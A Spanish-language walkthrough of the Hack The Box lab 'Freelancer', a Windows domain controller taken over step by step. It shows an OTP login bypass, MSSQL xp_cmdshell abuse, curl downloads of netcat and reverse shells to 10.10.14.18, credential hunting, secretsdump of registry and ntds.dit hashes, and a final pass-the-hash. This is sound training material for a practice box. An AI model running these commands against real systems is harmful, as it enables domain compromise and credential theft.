Freelancer

OS: Windows
Dificultad: Difícil
Puntos: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.64.53 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.64.53
Nmap scan report for 10.129.64.53
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-02 06:54:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
64416/tcp open  msrpc         Microsoft Windows RPC
64420/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Primero crearemos un usuario como employer.

Si intentamos acceder no podremos pero es posible restablecer el password para acceder.

Ahora podemos autenticarnos como employer y hay un apartado interesante llamado QR-Code.

Enum users

Investigando un poco podemos enumerar usuarios.

GET /accounts/profile/visit/2/ HTTP/1.1
Host: freelancer.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://freelancer.htb/blog/details/?article_id=12
Connection: keep-alive
Cookie: csrftoken=FbxM5FKMdMudJohQpDrOidxNglAqNQA3; sessionid=hdp9xfqeo26c907yf6jbaktqbktpkqh1
Upgrade-Insecure-Requests: 1

Vemos que el usuario admin tiene el ID 2.

http://freelancer.htb/accounts/profile/visit/2/

QR code

Si escaneamos el QR obtendremos una URL que podemos usar para autenticarnos sin un password.

http://freelancer.htb/accounts/login/otp/MTAwMTI=/a89aef23f0b7a95b8d37a2fe580e3f82/

Esta parte de la URL MTAwMTI= esta en base64, haciendo el decode es nuestro numero de usuario 10012.

Admin access

Copiaremos el codigo OTP del QR y modificaremos la URL para acceder a la cuenta de admin. Haremos log out de nuestro usuario actual y accedermos a la siguiente URL.

http://freelancer.htb/accounts/login/otp/Mg==/191c10c32ed0b19bc84a85b8056fc8d9/

Ahora estamos dentro de la cuenta de admin.

Podemos acceder al siguiente portal.

http://freelancer.htb/admin/

MSSQL Impersonate

Podemos impersonar al usuario sa para ejecutar comandos. Verificamos que es posible con el siguiente query.

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
sa

Habilitamos xp_cmdshell para ejecutar comandos del sistema.

EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options','1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell','1';
RECONFIGURE;

EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "net user"

Reverse Shell

Ejecutamos el siguiente query para obtener una reverse shell.

EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "mkdir c:\temp"
EXEC xp_cmdshell "curl 10.10.14.18/nc64.exe -o c:\temp\nc.exe"
EXEC xp_cmdshell "c:\temp\nc.exe 10.10.14.18 1234 -e cmd.exe"

Lateral Movement

Investigando los archivos para encontrar passwords.

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\Resources\1033\sqlcm.xml
Program Files (x86)\Microsoft SQL Server\150\Tools\PowerShell\Modules\SQLPS\en\Microsoft.SqlServer.Management.PSSnapins.dll-Help.xml
Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
Windows\Panther\MigLog.xml
Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_acb6d904135c6a14\Amd64\MSIPP.xml

Dentro del siguiente archivo encontramos un par de passwords.

type Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"

Las siguintes credenciales funcionan para conectarnos.

┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# crackmapexec smb 10.129.216.84 -u 'mikasaAckerman' -p 'IL0v3ErenY3ager'
SMB         10.129.216.84   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.216.84   445    DC               [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager

Obtenemos reverse shell con la tool RunasCs.exe.

https://github.com/antonioCoco/RunasCs

RunasCs.exe mikasaAckerman IL0v3ErenY3ager "C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe" -t 0

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-539d8$\Default
[+] Async process 'C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe' with pid 4396 created in background.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# nc -lvnp 6666           
listening on [any] 6666 ...
connect to [10.10.14.18] from (UNKNOWN) [10.129.216.84] 59496
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
freelancer\mikasaackerman

Privilege Escalation

Dentro del directorio c:\Users\mikasaAckerman\Desktop encontramos 2 archivos.

c:\Users\mikasaAckerman\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8954-28AE

 Directory of c:\Users\mikasaAckerman\Desktop

05/28/2024  10:22 AM    <DIR>          .
05/28/2024  10:22 AM    <DIR>          ..
10/28/2023  06:23 PM             1,468 mail.txt
10/04/2023  01:47 PM       292,692,678 MEMORY.7z
06/02/2024  12:09 PM                34 user.txt

Nos descargamos el archivo.

nc -lvnp 7777 > MEMORY.7z
c:\temp\nc.exe -w 700 10.10.14.18 7777 < MEMORY.7z

Analyzing DMP File

Utilizaremos la siguiente tool para montar el MEMORY.DMP en su version windows.

https://github.com/ufrisk/MemProcFS

MemProcFS.exe -device MEMORY.DMP -forensic 0

Una vez montado, buscamos los archivos SYSTEM, SAM, SECURITY.

M:\registry\hive_files

Ahora que tenemos los archivos utilizando impacket para extraer la informacion.

impacket-secretsdump  -system 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -sam 0xffffd3067d935000-SAM-MACHINE_SAM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCAL
[*] _SC_MSSQL$DATA 
(Unknown User):PWN3D#l0rr@Armessa199
[*] Cleaning up...

El password que obtivimos nos sirve con el usuario lorra199.

crackmapexec smb 10.129.185.251 -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue
SMB         10.129.185.251  445    DC               [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199

BloodHound Enum

Utilizando bloodhound podemos enumerar los objetos del AD.

python3 /opt/BloodHound.py/bloodhound.py -u 'mikasaAckerman' -p 'IL0v3ErenY3ager' -d freelancer.htb -c all -ns 10.129.216.84
INFO: Found AD domain: freelancer.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.freelancer.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 8 computers
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 30 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SetupMachine.freelancer.htb
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: Datacenter-2019
INFO: Querying computer: DC.freelancer.htb
WARNING: Could not resolve: Datacenter-2019: The resolution lifetime expired after 3.115 seconds: Server Do53:10.129.216.84@53 answered The DNS operation timed out.
INFO: Done in 00M 32S

El usuario lorra199 tiene el privilegio Generic Write en el grup AD Recycle Bin.

Obtenemos una reverse shell.

RunasCs.exe lorra199 'PWN3D#l0rr@Armessa199' "C:\temp\nc.exe 10.10.14.47 7777 -e cmd.exe" -t 0
┌──(root㉿kali)-[/opt/windows]
└─# nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.47] from (UNKNOWN) [10.129.185.251] 60453
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
freelancer\lorra199

Utilizando el siguiente comando podemos saber que objetos estan eliminados y podemos recuperar.

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Vemos el usuario liza.kazanof que pertenece al grupo Remote Management Users y Backup Operators. Podemos reestablecer el usuario de la siguiente forma.

Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "lkazanof_tmp"

Comprobamos que el usuario se restablecio.

crackmapexec winrm 10.129.185.251 -u liza.kazanof -p 'RockYou!'
SMB         10.129.185.251  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:freelancer.htb)
HTTP        10.129.185.251  5985   DC               [*] http://10.129.185.251:5985/wsman
WINRM       10.129.185.251  5985   DC               [+] freelancer.htb\liza.kazanof:RockYou! (Pwn3d!)

El password de liza se obtuvo con el siguiente recurso winDBG y mimikatz https://diverto.hr/en/blog/en-2019-11-05-Extracting-Passwords-from-hiberfil-and-memdumps/

Backup Operators

Este usuario pertence al grupo Backup Operators por lo tanto lo podemos usar para escalar privs.

evil-winrm -i 10.129.185.251 -u liza.kazanof -p 'RockYou!'
*Evil-WinRM* PS C:\Users\liza.kazanof\Documents> net user liza.kazanof
User name                    liza.kazanof
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/14/2024 6:37:29 PM
Password expires             6/25/2024 6:37:29 PM
Password changeable          5/15/2024 6:37:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Generamos una copia del disco duro de la siguiente forma.

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append 
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt

Copiamos los archivos necesarios.

robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM
robocopy /b Z:\Windows\NTDS C:\temp ntds.dit

Los descargamos.

download ntds.dit
dowload SAM
dowmload SYSTEM

Ahora hacemos dump de los archivos.

impacket-secretsdump -system SYSTEM -sam SAM -ntds ntds.dit LOCAL
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::

Con esto podemos hacer passthehash y conseguir admin.

evil-winrm -i 10.129.185.251 -u Administrator -H 0039318f1e8274633445bce32ad1a290